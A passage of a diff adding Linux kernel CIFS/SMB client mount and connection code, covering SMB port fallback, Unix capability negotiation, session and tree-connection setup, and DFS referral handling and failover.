++		trace_smb3_connect_err(server->hostname, server->conn_id, &server->dstaddr, rc);
++		sock_release(socket);
++		server->ssocket = NULL;
++		return rc;
++	}
++	trace_smb3_connect_done(server->hostname, server->conn_id, &server->dstaddr);
++	if (sport == htons(RFC1001_PORT))
++		rc = ip_rfc1001_connect(server);
++
++	return rc;
++}
++
++static int
++ip_connect(struct TCP_Server_Info *server)
++{
++	__be16 *sport;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++
++	if (server->dstaddr.ss_family == AF_INET6)
++		sport = &addr6->sin6_port;
++	else
++		sport = &addr->sin_port;
++
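++	/*
++	 * If no port was specified, try the direct SMB port 445 (CIFS_PORT)
++	 * first and fall back to the NetBIOS session port 139 (RFC1001_PORT)
++	 * below, so servers reachable on either port can be mounted without
++	 * an explicit port= option.
++	 */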
++	if (*sport == 0) {
++		int rc;
++
++		/* try with 445 port at first */
++		*sport = htons(CIFS_PORT);
++
++		rc = generic_ip_connect(server);
++		if (rc >= 0)
++			return rc;
++
++		/* if it failed, try with 139 port */
++		*sport = htons(RFC1001_PORT);
++	}
++
++	return generic_ip_connect(server);
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
++			  struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
++{
++	/*
++	 * If we are reconnecting, should we check whether any requested
++	 * capabilities changed locally, e.g. via remount? We cannot do much
++	 * about it here if they have (even if we could detect it by the
++	 * following). Perhaps we could add a backpointer from the tcon to an
++	 * array of sbs, or, if we changed all sbs on the same share to share
++	 * one sb as NFS does, we would only have one backpointer to the sb.
++	 * What if we wanted to mount the server share twice, once with and
++	 * once without posixacls or posix paths?
++	 */
++	__u64 saved_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++
++	if (ctx && ctx->no_linux_ext) {
++		tcon->fsUnixInfo.Capability = 0;
++		tcon->unix_ext = 0; /* Unix Extensions disabled */
++		cifs_dbg(FYI, "Linux protocol extensions disabled\n");
++		return;
++	} else if (ctx)
++		tcon->unix_ext = 1; /* Unix Extensions supported */
++
++	if (!tcon->unix_ext) {
++		cifs_dbg(FYI, "Unix extensions disabled so not set on reconnect\n");
++		return;
++	}
++
++	if (!CIFSSMBQFSUnixInfo(xid, tcon)) {
++		__u64 cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++		cifs_dbg(FYI, "unix caps which server supports %lld\n", cap);
++		/*
++		 * check for reconnect case in which we do not
++		 * want to change the mount behavior if we can avoid it
++		 */
++		if (ctx == NULL) {
++			/*
++			 * turn off POSIX ACL and PATHNAMES if not set
++			 * originally at mount time
++			 */
++			if ((saved_cap & CIFS_UNIX_POSIX_ACL_CAP) == 0)
++				cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
++			if ((saved_cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
++				if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
++					cifs_dbg(VFS, "POSIXPATH support change\n");
++				cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
++			} else if ((cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
++				cifs_dbg(VFS, "possible reconnect error\n");
++				cifs_dbg(VFS, "server disabled POSIX path support\n");
++			}
++		}
++
++		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
++			cifs_dbg(VFS, "per-share encryption not supported yet\n");
++
++		cap &= CIFS_UNIX_CAP_MASK;
++		if (ctx && ctx->no_psx_acl)
++			cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
++		else if (CIFS_UNIX_POSIX_ACL_CAP & cap) {
++			cifs_dbg(FYI, "negotiated posix acl support\n");
++			if (cifs_sb)
++				cifs_sb->mnt_cifs_flags |=
++					CIFS_MOUNT_POSIXACL;
++		}
++
++		if (ctx && ctx->posix_paths == 0)
++			cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
++		else if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) {
++			cifs_dbg(FYI, "negotiate posix pathnames\n");
++			if (cifs_sb)
++				cifs_sb->mnt_cifs_flags |=
++					CIFS_MOUNT_POSIX_PATHS;
++		}
++
++		cifs_dbg(FYI, "Negotiate caps 0x%x\n", (int)cap);
++#ifdef CONFIG_CIFS_DEBUG2
++		if (cap & CIFS_UNIX_FCNTL_CAP)
++			cifs_dbg(FYI, "FCNTL cap\n");
++		if (cap & CIFS_UNIX_EXTATTR_CAP)
++			cifs_dbg(FYI, "EXTATTR cap\n");
++		if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
++			cifs_dbg(FYI, "POSIX path cap\n");
++		if (cap & CIFS_UNIX_XATTR_CAP)
++			cifs_dbg(FYI, "XATTR cap\n");
++		if (cap & CIFS_UNIX_POSIX_ACL_CAP)
++			cifs_dbg(FYI, "POSIX ACL cap\n");
++		if (cap & CIFS_UNIX_LARGE_READ_CAP)
++			cifs_dbg(FYI, "very large read cap\n");
++		if (cap & CIFS_UNIX_LARGE_WRITE_CAP)
++			cifs_dbg(FYI, "very large write cap\n");
++		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP)
++			cifs_dbg(FYI, "transport encryption cap\n");
++		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
++			cifs_dbg(FYI, "mandatory transport encryption cap\n");
++#endif /* CIFS_DEBUG2 */
++		if (CIFSSMBSetFSUnixInfo(xid, tcon, cap)) {
++			if (ctx == NULL)
++				cifs_dbg(FYI, "resetting capabilities failed\n");
++			else
++				cifs_dbg(VFS, "Negotiating Unix capabilities with the server failed. Consider mounting with the Unix Extensions disabled if problems are found by specifying the nounix mount option.\n");
++
++		}
++	}
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb)
++{
++	struct smb3_fs_context *ctx = cifs_sb->ctx;
++
++	INIT_DELAYED_WORK(&cifs_sb->prune_tlinks, cifs_prune_tlinks);
++
++	spin_lock_init(&cifs_sb->tlink_tree_lock);
++	cifs_sb->tlink_tree = RB_ROOT;
++
++	cifs_dbg(FYI, "file mode: %04ho  dir mode: %04ho\n",
++		 ctx->file_mode, ctx->dir_mode);
++
++	/* this is needed for ASCII codepage to Unicode conversions */
++	if (ctx->iocharset == NULL) {
++		/* load_nls_default cannot return null */
++		cifs_sb->local_nls = load_nls_default();
++	} else {
++		cifs_sb->local_nls = load_nls(ctx->iocharset);
++		if (cifs_sb->local_nls == NULL) {
++			cifs_dbg(VFS, "CIFS mount error: iocharset %s not found\n",
++				 ctx->iocharset);
++			return -ELIBACC;
++		}
++	}
++	ctx->local_nls = cifs_sb->local_nls;
++
++	smb3_update_mnt_flags(cifs_sb);
++
++	if (ctx->direct_io)
++		cifs_dbg(FYI, "mounting share using direct i/o\n");
++	if (ctx->cache_ro) {
++		cifs_dbg(VFS, "mounting share with read only caching. Ensure that the share will not be modified while in use.\n");
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RO_CACHE;
++	} else if (ctx->cache_rw) {
++		cifs_dbg(VFS, "mounting share in single client RW caching mode. Ensure that no other systems will be accessing the share.\n");
++		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_RO_CACHE |
++					    CIFS_MOUNT_RW_CACHE);
++	}
++
++	if ((ctx->cifs_acl) && (ctx->dynperm))
++		cifs_dbg(VFS, "mount option dynperm ignored if cifsacl mount option supported\n");
++
++	if (ctx->prepath) {
++		cifs_sb->prepath = kstrdup(ctx->prepath, GFP_KERNEL);
++		if (cifs_sb->prepath == NULL)
++			return -ENOMEM;
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	}
++
++	return 0;
++}
++
++/* Release all successfully established connections */
++static inline void mount_put_conns(struct mount_ctx *mnt_ctx)
++{
++	if (mnt_ctx->tcon)
++		cifs_put_tcon(mnt_ctx->tcon);
++	else if (mnt_ctx->ses)
++		cifs_put_smb_ses(mnt_ctx->ses);
++	else if (mnt_ctx->server)
++		cifs_put_tcp_session(mnt_ctx->server, 0);
++	mnt_ctx->cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_POSIX_PATHS;
++	free_xid(mnt_ctx->xid);
++}
++
++/* Get connections for tcp, ses and tcon */
++static int mount_get_conns(struct mount_ctx *mnt_ctx)
++{
++	int rc = 0;
++	struct TCP_Server_Info *server = NULL;
++	struct cifs_ses *ses = NULL;
++	struct cifs_tcon *tcon = NULL;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	unsigned int xid;
++
++	xid = get_xid();
++
++	/* get a reference to a tcp session */
++	server = cifs_get_tcp_session(ctx, NULL);
++	if (IS_ERR(server)) {
++		rc = PTR_ERR(server);
++		server = NULL;
++		goto out;
++	}
++
++	/* get a reference to a SMB session */
++	ses = cifs_get_smb_ses(server, ctx);
++	if (IS_ERR(ses)) {
++		rc = PTR_ERR(ses);
++		ses = NULL;
++		goto out;
++	}
++
++	if ((ctx->persistent == true) && (!(ses->server->capabilities &
++					    SMB2_GLOBAL_CAP_PERSISTENT_HANDLES))) {
++		cifs_server_dbg(VFS, "persistent handles not supported by server\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	/* search for existing tcon to this server share */
++	tcon = cifs_get_tcon(ses, ctx);
++	if (IS_ERR(tcon)) {
++		rc = PTR_ERR(tcon);
++		tcon = NULL;
++		goto out;
++	}
++
++	/* if new SMB3.11 POSIX extensions are supported do not remap / and \ */
++	if (tcon->posix_extensions)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_POSIX_PATHS;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	/* tell server which Unix caps we support */
++	if (cap_unix(tcon->ses)) {
++		/*
++		 * The caps reset checks the mount to see if unix extensions
++		 * are disabled for just this mount.
++		 */
++		reset_cifs_unix_caps(xid, tcon, cifs_sb, ctx);
++		spin_lock(&tcon->ses->server->srv_lock);
++		if ((tcon->ses->server->tcpStatus == CifsNeedReconnect) &&
++		    (le64_to_cpu(tcon->fsUnixInfo.Capability) &
++		     CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)) {
++			spin_unlock(&tcon->ses->server->srv_lock);
++			rc = -EACCES;
++			goto out;
++		}
++		spin_unlock(&tcon->ses->server->srv_lock);
++	} else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		tcon->unix_ext = 0; /* server does not support them */
++
++	/* do not care if the following call succeeds - informational */
++	if (!tcon->pipe && server->ops->qfs_tcon) {
++		server->ops->qfs_tcon(xid, tcon, cifs_sb);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE) {
++			if (tcon->fsDevInfo.DeviceCharacteristics &
++			    cpu_to_le32(FILE_READ_ONLY_DEVICE))
++				cifs_dbg(VFS, "mounted to read only share\n");
++			else if ((cifs_sb->mnt_cifs_flags &
++				  CIFS_MOUNT_RW_CACHE) == 0)
++				cifs_dbg(VFS, "read only mount of RW share\n");
++			/* no need to log a RW mount of a typical RW share */
++		}
++	}
++
++	/*
++	 * Clamp the rsize/wsize mount arguments if they are too big for the server
++	 * and set the rsize/wsize to the negotiated values if not passed in by
++	 * the user on mount
++	 */
++	if ((cifs_sb->ctx->wsize == 0) ||
++	    (cifs_sb->ctx->wsize > server->ops->negotiate_wsize(tcon, ctx)))
++		cifs_sb->ctx->wsize = server->ops->negotiate_wsize(tcon, ctx);
++	if ((cifs_sb->ctx->rsize == 0) ||
++	    (cifs_sb->ctx->rsize > server->ops->negotiate_rsize(tcon, ctx)))
++		cifs_sb->ctx->rsize = server->ops->negotiate_rsize(tcon, ctx);
++
++	/*
++	 * The cookie is initialized from the volume info returned above.
++	 * Inside cifs_fscache_get_super_cookie it checks
++	 * that we do not get the super cookie twice.
++	 */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
++		cifs_fscache_get_super_cookie(tcon);
++
++out:
++	mnt_ctx->server = server;
++	mnt_ctx->ses = ses;
++	mnt_ctx->tcon = tcon;
++	mnt_ctx->xid = xid;
++
++	return rc;
++}
++
++static int mount_setup_tlink(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
++			     struct cifs_tcon *tcon)
++{
++	struct tcon_link *tlink;
++
++	/* hang the tcon off of the superblock */
++	tlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
++	if (tlink == NULL)
++		return -ENOMEM;
++
++	tlink->tl_uid = ses->linux_uid;
++	tlink->tl_tcon = tcon;
++	tlink->tl_time = jiffies;
++	set_bit(TCON_LINK_MASTER, &tlink->tl_flags);
++	set_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
++
++	cifs_sb->master_tlink = tlink;
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
++				TLINK_IDLE_EXPIRE);
++	return 0;
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++/* Get unique dfs connections */
++static int mount_get_dfs_conns(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++
++	mnt_ctx->fs_ctx->nosharesock = true;
++	rc = mount_get_conns(mnt_ctx);
++	if (mnt_ctx->server) {
++		cifs_dbg(FYI, "%s: marking tcp session as a dfs connection\n", __func__);
++		spin_lock(&mnt_ctx->server->srv_lock);
++		mnt_ctx->server->is_dfs_conn = true;
++		spin_unlock(&mnt_ctx->server->srv_lock);
++	}
++	return rc;
++}
++
++/*
++ * cifs_build_path_to_root returns the full path to the root when we do not
++ * have an existing connection (tcon)
++ */
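++/*
++ * E.g. (hypothetical values): UNC "\\srv\share" with prepath "a\b" yields
++ * "\\srv\share\a\b", with all delimiters converted to the superblock's
++ * directory separator.
++ */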
++static char *
++build_unc_path_to_root(const struct smb3_fs_context *ctx,
++		       const struct cifs_sb_info *cifs_sb, bool useppath)
++{
++	char *full_path, *pos;
++	unsigned int pplen = useppath && ctx->prepath ?
++		strlen(ctx->prepath) + 1 : 0;
++	unsigned int unc_len = strnlen(ctx->UNC, MAX_TREE_SIZE + 1);
++
++	if (unc_len > MAX_TREE_SIZE)
++		return ERR_PTR(-EINVAL);
++
++	full_path = kmalloc(unc_len + pplen + 1, GFP_KERNEL);
++	if (full_path == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	memcpy(full_path, ctx->UNC, unc_len);
++	pos = full_path + unc_len;
++
++	if (pplen) {
++		*pos = CIFS_DIR_SEP(cifs_sb);
++		memcpy(pos + 1, ctx->prepath, pplen);
++		pos += pplen;
++	}
++
++	*pos = '\0'; /* add trailing null */
++	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
++	cifs_dbg(FYI, "%s: full_path=%s\n", __func__, full_path);
++	return full_path;
++}
++
++/*
++ * expand_dfs_referral - Update cifs_sb from dfs referral path
++ *
++ * cifs_sb->ctx->mount_options will be (re-)allocated to a string containing updated options for the
++ * submount.  Otherwise it will be left untouched.
++ */
++static int expand_dfs_referral(struct mount_ctx *mnt_ctx, const char *full_path,
++			       struct dfs_info3_param *referral)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *fake_devname = NULL, *mdata = NULL;
++
++	mdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options, full_path + 1, referral,
++					   &fake_devname);
++	if (IS_ERR(mdata)) {
++		rc = PTR_ERR(mdata);
++		mdata = NULL;
++	} else {
++		/*
++		 * We cannot clear out the whole structure since we no longer have an explicit
++		 * function to parse a mount-string. Instead we need to clear out the individual
++		 * fields that are no longer valid.
++		 */
++		kfree(ctx->prepath);
++		ctx->prepath = NULL;
++		rc = cifs_setup_volume_info(ctx, mdata, fake_devname);
++	}
++	kfree(fake_devname);
++	kfree(cifs_sb->ctx->mount_options);
++	cifs_sb->ctx->mount_options = mdata;
++
++	return rc;
++}
++#endif
++
++/* TODO: all callers of this are broken. We are not parsing mount_options
++ * here; should we pass a clone of the original context?
++ */
++int
++cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname)
++{
++	int rc;
++
++	if (devname) {
++		cifs_dbg(FYI, "%s: devname=%s\n", __func__, devname);
++		rc = smb3_parse_devname(devname, ctx);
++		if (rc) {
++			cifs_dbg(VFS, "%s: failed to parse %s: %d\n", __func__, devname, rc);
++			return rc;
++		}
++	}
++
++	if (mntopts) {
++		char *ip;
++
++		rc = smb3_parse_opt(mntopts, "ip", &ip);
++		if (rc) {
++			cifs_dbg(VFS, "%s: failed to parse ip options: %d\n", __func__, rc);
++			return rc;
++		}
++
++		rc = cifs_convert_address((struct sockaddr *)&ctx->dstaddr, ip, strlen(ip));
++		kfree(ip);
++		if (!rc) {
++			cifs_dbg(VFS, "%s: failed to convert ip address\n", __func__);
++			return -EINVAL;
++		}
++	}
++
++	if (ctx->nullauth) {
++		cifs_dbg(FYI, "Anonymous login\n");
++		kfree(ctx->username);
++		ctx->username = NULL;
++	} else if (ctx->username) {
++		/* BB fixme parse for domain name here */
++		cifs_dbg(FYI, "Username: %s\n", ctx->username);
++	} else {
++		cifs_dbg(VFS, "No username specified\n");
++	/* In the userspace mount helper we can get the user name from
++	   alternate locations such as env variables and files on disk */
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
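++/*
++ * Probe each partial prefix path by temporarily NUL-terminating full_path at
++ * every separator; e.g. (for illustration) "\dir1\dir2" is checked as "",
++ * then "\dir1", then "\dir1\dir2", stopping at the first inaccessible
++ * component.
++ */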
++static int
++cifs_are_all_path_components_accessible(struct TCP_Server_Info *server,
++					unsigned int xid,
++					struct cifs_tcon *tcon,
++					struct cifs_sb_info *cifs_sb,
++					char *full_path,
++					int added_treename)
++{
++	int rc;
++	char *s;
++	char sep, tmp;
++	int skip = added_treename ? 1 : 0;
++
++	sep = CIFS_DIR_SEP(cifs_sb);
++	s = full_path;
++
++	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb, "");
++	while (rc == 0) {
++		/* skip separators */
++		while (*s == sep)
++			s++;
++		if (!*s)
++			break;
++		/* next separator */
++		while (*s && *s != sep)
++			s++;
++		/*
++		 * if the treename is added, we then have to skip the first
++		 * part within the separators
++		 */
++		if (skip) {
++			skip = 0;
++			continue;
++		}
++		/*
++		 * temporarily null-terminate the path at the end of
++		 * the current component
++		 */
++		tmp = *s;
++		*s = 0;
++		rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
++						     full_path);
++		*s = tmp;
++	}
++	return rc;
++}
++
++/*
++ * Check if path is remote (i.e. a DFS share).
++ *
++ * Return -EREMOTE if it is, otherwise 0 or -errno.
++ */
++static int is_path_remote(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct TCP_Server_Info *server = mnt_ctx->server;
++	unsigned int xid = mnt_ctx->xid;
++	struct cifs_tcon *tcon = mnt_ctx->tcon;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *full_path;
++
++	if (!server->ops->is_path_accessible)
++		return -EOPNOTSUPP;
++
++	/*
++	 * cifs_build_path_to_root works only when we have a valid tcon
++	 */
++	full_path = cifs_build_path_to_root(ctx, cifs_sb, tcon,
++					    tcon->Flags & SMB_SHARE_IS_IN_DFS);
++	if (full_path == NULL)
++		return -ENOMEM;
++
++	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
++
++	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
++					     full_path);
++	if (rc != 0 && rc != -EREMOTE)
++		goto out;
++
++	if (rc != -EREMOTE) {
++		rc = cifs_are_all_path_components_accessible(server, xid, tcon,
++			cifs_sb, full_path, tcon->Flags & SMB_SHARE_IS_IN_DFS);
++		if (rc != 0) {
++			cifs_server_dbg(VFS, "cannot query dirs between root and final path, enabling CIFS_MOUNT_USE_PREFIX_PATH\n");
++			cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++			rc = 0;
++		}
++	}
++
++out:
++	kfree(full_path);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++static void set_root_ses(struct mount_ctx *mnt_ctx)
++{
++	if (mnt_ctx->ses) {
++		spin_lock(&cifs_tcp_ses_lock);
++		mnt_ctx->ses->ses_count++;
++		spin_unlock(&cifs_tcp_ses_lock);
++		dfs_cache_add_refsrv_session(&mnt_ctx->mount_id, mnt_ctx->ses);
++	}
++	mnt_ctx->root_ses = mnt_ctx->ses;
++}
++
++static int is_dfs_mount(struct mount_ctx *mnt_ctx, bool *isdfs, struct dfs_cache_tgt_list *root_tl)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++
++	*isdfs = true;
++
++	rc = mount_get_conns(mnt_ctx);
++	/*
++	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
++	 * try to get a DFS referral (even cached) to determine whether it is a DFS mount.
++	 *
++	 * Skip prefix path to provide support for DFS referrals from w2k8 servers which don't seem
++	 * to respond with PATH_NOT_COVERED to requests that include the prefix.
++	 */
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    dfs_cache_find(mnt_ctx->xid, mnt_ctx->ses, cifs_sb->local_nls, cifs_remap(cifs_sb),
++			   ctx->UNC + 1, NULL, root_tl)) {
++		if (rc)
++			return rc;
++		/* Check if it is fully accessible and then mount it */
++		rc = is_path_remote(mnt_ctx);
++		if (!rc)
++			*isdfs = false;
++		else if (rc != -EREMOTE)
++			return rc;
++	}
++	return 0;
++}
++
++static int connect_dfs_target(struct mount_ctx *mnt_ctx, const char *full_path,
++			      const char *ref_path, struct dfs_cache_tgt_iterator *tit)
++{
++	int rc;
++	struct dfs_info3_param ref = {};
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	char *oldmnt = cifs_sb->ctx->mount_options;
++
++	cifs_dbg(FYI, "%s: full_path=%s ref_path=%s target=%s\n", __func__, full_path, ref_path,
++		 dfs_cache_get_tgt_name(tit));
++
++	rc = dfs_cache_get_tgt_referral(ref_path, tit, &ref);
++	if (rc)
++		goto out;
++
++	rc = expand_dfs_referral(mnt_ctx, full_path, &ref);
++	if (rc)
++		goto out;
++
++	/* Connect to new target only if we were redirected (e.g. mount options changed) */
++	if (oldmnt != cifs_sb->ctx->mount_options) {
++		mount_put_conns(mnt_ctx);
++		rc = mount_get_dfs_conns(mnt_ctx);
++	}
++	if (!rc) {
++		if (cifs_is_referral_server(mnt_ctx->tcon, &ref))
++			set_root_ses(mnt_ctx);
++		rc = dfs_cache_update_tgthint(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
++					      cifs_remap(cifs_sb), ref_path, tit);
++	}
++
++out:
++	free_dfs_info_param(&ref);
++	return rc;
++}
++
++static int connect_dfs_root(struct mount_ctx *mnt_ctx, struct dfs_cache_tgt_list *root_tl)
++{
++	int rc;
++	char *full_path;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct dfs_cache_tgt_iterator *tit;
++
++	/* Put initial connections as they might be shared with other mounts.  We need unique dfs
++	 * connections per mount to fail over properly, so mount_get_dfs_conns() must be used from
++	 * now on.
++	 */
++	mount_put_conns(mnt_ctx);
++	mount_get_dfs_conns(mnt_ctx);
++	set_root_ses(mnt_ctx);
++
++	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
++	if (IS_ERR(full_path))
++		return PTR_ERR(full_path);
++
++	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(ctx->UNC, cifs_sb->local_nls,
++							    cifs_remap(cifs_sb));
++	if (IS_ERR(mnt_ctx->origin_fullpath)) {
++		rc = PTR_ERR(mnt_ctx->origin_fullpath);
++		mnt_ctx->origin_fullpath = NULL;
++		goto out;
++	}
++
++	/* Try all dfs root targets */
++	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(root_tl);
++	     tit; tit = dfs_cache_get_next_tgt(root_tl, tit)) {
++		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->origin_fullpath + 1, tit);
++		if (!rc) {
++			mnt_ctx->leaf_fullpath = kstrdup(mnt_ctx->origin_fullpath, GFP_KERNEL);
++			if (!mnt_ctx->leaf_fullpath)
++				rc = -ENOMEM;
++			break;
++		}
++	}
++
++out:
++	kfree(full_path);
++	return rc;
++}
++
++static int __follow_dfs_link(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *full_path;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	struct dfs_cache_tgt_iterator *tit;
++
++	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
++	if (IS_ERR(full_path))
++		return PTR_ERR(full_path);
++
++	kfree(mnt_ctx->leaf_fullpath);
++	mnt_ctx->leaf_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
++							  cifs_remap(cifs_sb));
++	if (IS_ERR(mnt_ctx->leaf_fullpath)) {
++		rc = PTR_ERR(mnt_ctx->leaf_fullpath);
++		mnt_ctx->leaf_fullpath = NULL;
++		goto out;
++	}
++
++	/* Get referral from dfs link */
++	rc = dfs_cache_find(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
++			    cifs_remap(cifs_sb), mnt_ctx->leaf_fullpath + 1, NULL, &tl);
++	if (rc)
++		goto out;
++
++	/* Try all dfs link targets.  If an I/O fails from currently connected DFS target with an
++	 * error other than STATUS_PATH_NOT_COVERED (-EREMOTE), then retry it from other targets as
++	 * specified in MS-DFSC "3.1.5.2 I/O Operation to Target Fails with an Error Other Than
++	 * STATUS_PATH_NOT_COVERED."
++	 */
++	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(&tl);
++	     tit; tit = dfs_cache_get_next_tgt(&tl, tit)) {
++		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->leaf_fullpath + 1, tit);
++		if (!rc) {
++			rc = is_path_remote(mnt_ctx);
++			if (!rc || rc == -EREMOTE)
++				break;
++		}
++	}
++
++out:
++	kfree(full_path);
++	dfs_cache_free_tgts(&tl);
++	return rc;
++}
++
++static int follow_dfs_link(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *full_path;
++	int num_links = 0;
++
++	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
++	if (IS_ERR(full_path))
++		return PTR_ERR(full_path);
++
++	kfree(mnt_ctx->origin_fullpath);
++	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
++							    cifs_remap(cifs_sb));
++	kfree(full_path);
++
++	if (IS_ERR(mnt_ctx->origin_fullpath)) {
++		rc = PTR_ERR(mnt_ctx->origin_fullpath);
++		mnt_ctx->origin_fullpath = NULL;
++		return rc;
++	}
++
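++	/*
++	 * Chase nested DFS links, giving up with -ELOOP once MAX_NESTED_LINKS
++	 * referrals have been followed without reaching a final target.
++	 */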
++	do {
++		rc = __follow_dfs_link(mnt_ctx);
++		if (!rc || rc != -EREMOTE)
++			break;
++	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
++
++	return rc;
++}
++
++/* Set up DFS referral paths for failover */
++static void setup_server_referral_paths(struct mount_ctx *mnt_ctx)
++{
++	struct TCP_Server_Info *server = mnt_ctx->server;
++
++	mutex_lock(&server->refpath_lock);
++	server->origin_fullpath = mnt_ctx->origin_fullpath;
++	server->leaf_fullpath = mnt_ctx->leaf_fullpath;
++	server->current_fullpath = mnt_ctx->leaf_fullpath;
++	mutex_unlock(&server->refpath_lock);
++	mnt_ctx->origin_fullpath = mnt_ctx->leaf_fullpath = NULL;
++}
++
++int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
++{
++	int rc;
++	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	bool isdfs;
++
++	rc = is_dfs_mount(&mnt_ctx, &isdfs, &tl);
++	if (rc)
++		goto error;
++	if (!isdfs)
++		goto out;
++
++	/* proceed as DFS mount */
++	uuid_gen(&mnt_ctx.mount_id);
++	rc = connect_dfs_root(&mnt_ctx, &tl);
++	dfs_cache_free_tgts(&tl);
++
++	if (rc)
++		goto error;
++
++	rc = is_path_remote(&mnt_ctx);
++	if (rc)
++		rc = follow_dfs_link(&mnt_ctx);
++	if (rc)
++		goto error;
++
++	setup_server_referral_paths(&mnt_ctx);
++	/*
++	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
++	 * serverino. This prevents dentry revalidation from thinking the dentries are stale (ESTALE).
++	 */
++	cifs_autodisable_serverino(cifs_sb);
++	/*
++	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
++	 * that have different prefix paths.
++	 */
